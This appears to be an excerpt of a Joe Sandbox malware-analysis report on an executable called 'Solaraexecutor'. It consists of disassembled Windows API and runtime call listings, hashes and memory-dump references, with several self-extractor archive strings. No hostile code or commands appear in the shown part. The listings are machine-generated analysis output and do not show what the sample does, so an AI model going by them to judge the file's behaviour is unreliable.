                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: _wcslen
                                                      • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                      • API String ID: 176396367-3743748572
                                                      • Opcode ID: c68a4f8de696cb5f5e74154c9a7713bd43aedde2ae395b5552bb97bab27701a6
                                                      • Instruction ID: 32e6132d4d6dd38ce7260eecd18e32869577a53394bb84ddb6742636bca94e45
                                                      • Opcode Fuzzy Hash: c68a4f8de696cb5f5e74154c9a7713bd43aedde2ae395b5552bb97bab27701a6
                                                      • Instruction Fuzzy Hash: 80314D3264434556DA34AB549C52B7BF3E4EB90720F64462FF98657280FBE0ED8583B2
                                                      APIs
                                                        • Part of subcall function 00D4C868: _free.LIBCMT ref: 00D4C891
                                                      • _free.LIBCMT ref: 00D4C8F2
                                                        • Part of subcall function 00D48DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00D4C896,?,00000000,?,00000000,?,00D4C8BD,?,00000007,?,?,00D4CCBA,?), ref: 00D48DE2
                                                        • Part of subcall function 00D48DCC: GetLastError.KERNEL32(?,?,00D4C896,?,00000000,?,00000000,?,00D4C8BD,?,00000007,?,?,00D4CCBA,?,?), ref: 00D48DF4
                                                      • _free.LIBCMT ref: 00D4C8FD
                                                      • _free.LIBCMT ref: 00D4C908
                                                      • _free.LIBCMT ref: 00D4C95C
                                                      • _free.LIBCMT ref: 00D4C967
                                                      • _free.LIBCMT ref: 00D4C972
                                                      • _free.LIBCMT ref: 00D4C97D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                      • Instruction ID: a681dae2b2ab401840cae1c059b0018f4e0512a798e44d27c664d601d5887549
                                                      • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                      • Instruction Fuzzy Hash: 3A111F71A92B08ABE560B7B1CC07FCB7BACDF04B00F845C15B29D66092DB65B5059B70
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00D3E669,00D3E5CC,00D3E86D), ref: 00D3E605
                                                      • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00D3E61B
                                                      • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00D3E630
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$HandleModule
                                                      • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                      • API String ID: 667068680-1718035505
                                                      • Opcode ID: 2bdbe9f09638865d5bca6ebf4931ba3059d206db5304bd77d573ec5546b7f262
                                                      • Instruction ID: 8786be8217f6d52801bb9ee0bac9c184ab2fcabadfb74f82b446b517de5172d0
                                                      • Opcode Fuzzy Hash: 2bdbe9f09638865d5bca6ebf4931ba3059d206db5304bd77d573ec5546b7f262
                                                      • Instruction Fuzzy Hash: 5EF0F6357903225F0F224F6A5C96566A3DC6A25792B080C39ED41D33D0FB10CC5D9BF0
                                                      APIs
                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D314C2
                                                        • Part of subcall function 00D2B146: GetVersionExW.KERNEL32(?), ref: 00D2B16B
                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00D314E6
                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D31500
                                                      • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00D31513
                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D31523
                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D31533
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: Time$File$System$Local$SpecificVersion
                                                      • String ID:
                                                      • API String ID: 2092733347-0
                                                      • Opcode ID: 0b09ed5cc87aa35541f12566f941acac8b13eadfb6b9705aa1ca34a18abd4a2b
                                                      • Instruction ID: fca72ad60bfec42c6007d17b0e918dce45a92f4393785f142a1d8ffa88bbe58a
                                                      • Opcode Fuzzy Hash: 0b09ed5cc87aa35541f12566f941acac8b13eadfb6b9705aa1ca34a18abd4a2b
                                                      • Instruction Fuzzy Hash: FC31F879108306ABC700DFA8C88499BB7F8FF98755F004A1EF995C3210E730D509CBA6
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,00D42AF1,00D402FC,00D3FA34), ref: 00D42B08
                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D42B16
                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D42B2F
                                                      • SetLastError.KERNEL32(00000000,00D42AF1,00D402FC,00D3FA34), ref: 00D42B81
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastValue___vcrt_
                                                      • String ID:
                                                      • API String ID: 3852720340-0
                                                      • Opcode ID: 2dbbcdea393f1e2c951d219f405f8e8ff7eb6ca30fb89e8cfb77426dac9a109e
                                                      • Instruction ID: ee7532488e5d0feee493a72d0cba7d48ec56eee46eb9b653ee55851859a4e84a
                                                      • Opcode Fuzzy Hash: 2dbbcdea393f1e2c951d219f405f8e8ff7eb6ca30fb89e8cfb77426dac9a109e
                                                      • Instruction Fuzzy Hash: 3A01F7325097116FAA182F787C8593B2F59EF457B67E40739F910952E4EF114E049174
                                                      APIs
                                                      • GetLastError.KERNEL32(?,00D61030,00D44674,00D61030,?,?,00D43F73,00000050,?,00D61030,00000200), ref: 00D497E9
                                                      • _free.LIBCMT ref: 00D4981C
                                                      • _free.LIBCMT ref: 00D49844
                                                      • SetLastError.KERNEL32(00000000,?,00D61030,00000200), ref: 00D49851
                                                      • SetLastError.KERNEL32(00000000,?,00D61030,00000200), ref: 00D4985D
                                                      • _abort.LIBCMT ref: 00D49863
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_free$_abort
                                                      • String ID:
                                                      • API String ID: 3160817290-0
                                                      • Opcode ID: 3174dbcf1ff90bb22199b7573e99619e6e1ba0e64f527e5ca703553cddbc3e2f
                                                      • Instruction ID: 46486551ab03201a73f455097a196a68d117ca50cd85f2fcbc5db995a3d56c4c
                                                      • Opcode Fuzzy Hash: 3174dbcf1ff90bb22199b7573e99619e6e1ba0e64f527e5ca703553cddbc3e2f
                                                      • Instruction Fuzzy Hash: BFF0A4355407016BC652372E6C2AB2FAA65CFE27B2F290134F924D22D2EF21C9055575
                                                      APIs
                                                      • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00D3DC47
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D3DC61
                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D3DC72
                                                      • TranslateMessage.USER32(?), ref: 00D3DC7C
                                                      • DispatchMessageW.USER32(?), ref: 00D3DC86
                                                      • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00D3DC91
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                      • String ID:
                                                      • API String ID: 2148572870-0
                                                      • Opcode ID: 85b7ccb13c6c0215cf215f52c03598306595b306b60bb29cb78cc12f4df9e80b
                                                      • Instruction ID: d33bf0cdefed8d4191141aae88312888a959e3b9f6c67f0a23127b1b1182c641
                                                      • Opcode Fuzzy Hash: 85b7ccb13c6c0215cf215f52c03598306595b306b60bb29cb78cc12f4df9e80b
                                                      • Instruction Fuzzy Hash: 67F03C72A11319BBCB206FA5EC4CDCB7F6DEF46B91F044111B50AD2150D6748646CBB0
                                                      APIs
                                                        • Part of subcall function 00D305DA: _wcslen.LIBCMT ref: 00D305E0
                                                        • Part of subcall function 00D2B92D: _wcsrchr.LIBVCRUNTIME ref: 00D2B944
                                                      • _wcslen.LIBCMT ref: 00D2C197
                                                      • _wcslen.LIBCMT ref: 00D2C1DF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$_wcsrchr
                                                      • String ID: .exe$.rar$.sfx
                                                      • API String ID: 3513545583-31770016
                                                      • Opcode ID: f7d98e11e220b0463a2283b2dea84cbbc746728ebefb92cc3a3d3c5d59285d6e
                                                      • Instruction ID: 226b13813437e9755caff838ed3b98dd3385da9f72d13e761ae76d94ff9a028b
                                                      • Opcode Fuzzy Hash: f7d98e11e220b0463a2283b2dea84cbbc746728ebefb92cc3a3d3c5d59285d6e
                                                      • Instruction Fuzzy Hash: 70417B2652037196C732AF34A813A7F73A4EF6175CF28650EF9C26B081EB518D95C3B5
                                                      APIs
                                                      • GetTempPathW.KERNEL32(00000800,?), ref: 00D3CE9D
                                                        • Part of subcall function 00D2B690: _wcslen.LIBCMT ref: 00D2B696
                                                      • _swprintf.LIBCMT ref: 00D3CED1
                                                        • Part of subcall function 00D24092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D240A5
                                                      • SetDlgItemTextW.USER32(?,00000066,00D6946A), ref: 00D3CEF1
                                                      • EndDialog.USER32(?,00000001), ref: 00D3CFFE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                      • String ID: %s%s%u
                                                      • API String ID: 110358324-1360425832
                                                      • Opcode ID: 1c367ab3a8a53e242198c395b83814a00d4302d6903e797d7a9e441ae1f42f04
                                                      • Instruction ID: 664ca47768248bb63c7ca7c524697d0974c69a6ae9e07c958c91c47985984695
                                                      • Opcode Fuzzy Hash: 1c367ab3a8a53e242198c395b83814a00d4302d6903e797d7a9e441ae1f42f04
                                                      • Instruction Fuzzy Hash: 8E419EB1900218AADF259BA0DC45EEE77BDEF05341F4480A6FA09E7141EEB19A84CF71
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 00D2BB27
                                                      • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00D2A275,?,?,00000800,?,00D2A23A,?,00D2755C), ref: 00D2BBC5
                                                      • _wcslen.LIBCMT ref: 00D2BC3B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$CurrentDirectory
                                                      • String ID: UNC$\\?\
                                                      • API String ID: 3341907918-253988292
                                                      • Opcode ID: abd697e57395257785f180b47875b095231e7e6217a56a7932560a26d8380e9b
                                                      • Instruction ID: 706cb34ac657558e9cee9496e1f883b5928f0eb09007a1cdb214863ec79feaed
                                                      • Opcode Fuzzy Hash: abd697e57395257785f180b47875b095231e7e6217a56a7932560a26d8380e9b
                                                      • Instruction Fuzzy Hash: A541B771400625AACF21AF30EC01EEE7769EF513A9F188467F855A3151DBF0DE94DAB0
                                                      APIs
                                                      • LoadBitmapW.USER32(00000065), ref: 00D3B6ED
                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 00D3B712
                                                      • DeleteObject.GDI32(00000000), ref: 00D3B744
                                                      • DeleteObject.GDI32(00000000), ref: 00D3B767
                                                        • Part of subcall function 00D3A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00D3B73D,00000066), ref: 00D3A6D5
                                                        • Part of subcall function 00D3A6C2: SizeofResource.KERNEL32(00000000,?,?,?,00D3B73D,00000066), ref: 00D3A6EC
                                                        • Part of subcall function 00D3A6C2: LoadResource.KERNEL32(00000000,?,?,?,00D3B73D,00000066), ref: 00D3A703
                                                        • Part of subcall function 00D3A6C2: LockResource.KERNEL32(00000000,?,?,?,00D3B73D,00000066), ref: 00D3A712
                                                        • Part of subcall function 00D3A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00D3B73D,00000066), ref: 00D3A72D
                                                        • Part of subcall function 00D3A6C2: GlobalLock.KERNEL32(00000000), ref: 00D3A73E
                                                        • Part of subcall function 00D3A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00D3A762
                                                        • Part of subcall function 00D3A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00D3A7A7
                                                        • Part of subcall function 00D3A6C2: GlobalUnlock.KERNEL32(00000000), ref: 00D3A7C6
                                                        • Part of subcall function 00D3A6C2: GlobalFree.KERNEL32(00000000), ref: 00D3A7CD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                      • String ID: ]
                                                      • API String ID: 1797374341-3352871620
                                                      • Opcode ID: c33300ac271f5b24636a74c2b9188c3fb1697202ba02ef878e69dab3978d9133
                                                      • Instruction ID: e594b69acd02c53c3bb2083efcaa570231e8822409deff974c62eeb8eadb960f
                                                      • Opcode Fuzzy Hash: c33300ac271f5b24636a74c2b9188c3fb1697202ba02ef878e69dab3978d9133
                                                      • Instruction Fuzzy Hash: 2901C07660071167C712BB789C0AABF7AB9EFC0B62F090012FA40B7291DF618D0542B2
                                                      APIs
                                                        • Part of subcall function 00D21316: GetDlgItem.USER32(00000000,00003021), ref: 00D2135A
                                                        • Part of subcall function 00D21316: SetWindowTextW.USER32(00000000,00D535F4), ref: 00D21370
                                                      • EndDialog.USER32(?,00000001), ref: 00D3D64B
                                                      • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00D3D661
                                                      • SetDlgItemTextW.USER32(?,00000066,?), ref: 00D3D675
                                                      • SetDlgItemTextW.USER32(?,00000068), ref: 00D3D684
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: ItemText$DialogWindow
                                                      • String ID: RENAMEDLG
                                                      • API String ID: 445417207-3299779563
                                                      • Opcode ID: 80b38280de2ed004f68fccefe4014dec5ac02ab06ff4b4ff7857845febf54fc7
                                                      • Instruction ID: 87e2183bdeba801bc5d40f9e4efef4c6d062cb5e6fcd2cb1a753701fb4c714d1
                                                      • Opcode Fuzzy Hash: 80b38280de2ed004f68fccefe4014dec5ac02ab06ff4b4ff7857845febf54fc7
                                                      • Instruction Fuzzy Hash: 3E01F533244318BAD2214F64BD0AF56776EEB9AB01F110010F649E61D4C6A299048F75
                                                      APIs
                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00D47E24,00000000,?,00D47DC4,00000000,00D5C300,0000000C,00D47F1B,00000000,00000002), ref: 00D47E93
                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D47EA6
                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00D47E24,00000000,?,00D47DC4,00000000,00D5C300,0000000C,00D47F1B,00000000,00000002), ref: 00D47EC9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                      • String ID: CorExitProcess$mscoree.dll
                                                      • API String ID: 4061214504-1276376045
                                                      • Opcode ID: 907f0918a1b0cfafd221b7c75d1762ef01ffe07858e3b11a0f302d96cb350570
                                                      • Instruction ID: c268ba78cd9a40761617620725ac7ff4b3cd46aea4ae625b8a1c5cffe01c07f9
                                                      • Opcode Fuzzy Hash: 907f0918a1b0cfafd221b7c75d1762ef01ffe07858e3b11a0f302d96cb350570
                                                      • Instruction Fuzzy Hash: 34F04F31A04309BFDB119FA4DC09B9EBFB4EB44752F0441A9FC05E22A0DB709E44CAB4
                                                      APIs
                                                        • Part of subcall function 00D3081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D30836
                                                        • Part of subcall function 00D3081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D2F2D8,Crypt32.dll,00000000,00D2F35C,?,?,00D2F33E,?,?,?), ref: 00D30858
                                                      • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00D2F2E4
                                                      • GetProcAddress.KERNEL32(00D681C8,CryptUnprotectMemory), ref: 00D2F2F4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                      • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                      • API String ID: 2141747552-1753850145
                                                      • Opcode ID: d2afb927cc25e3c205a146c9f0852fa7646f50f9a40cbbdce81bd5a5ec42de15
                                                      • Instruction ID: 13e11699a91eef3ffe1a682a40347686ee6a0bbcfb9e83df68b147fd4060bd7c
                                                      • Opcode Fuzzy Hash: d2afb927cc25e3c205a146c9f0852fa7646f50f9a40cbbdce81bd5a5ec42de15
                                                      • Instruction Fuzzy Hash: EBE086719107519EDB219F38A84DB027EE4AF14745F14882DFCDAD3680DAB4D5488B70
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
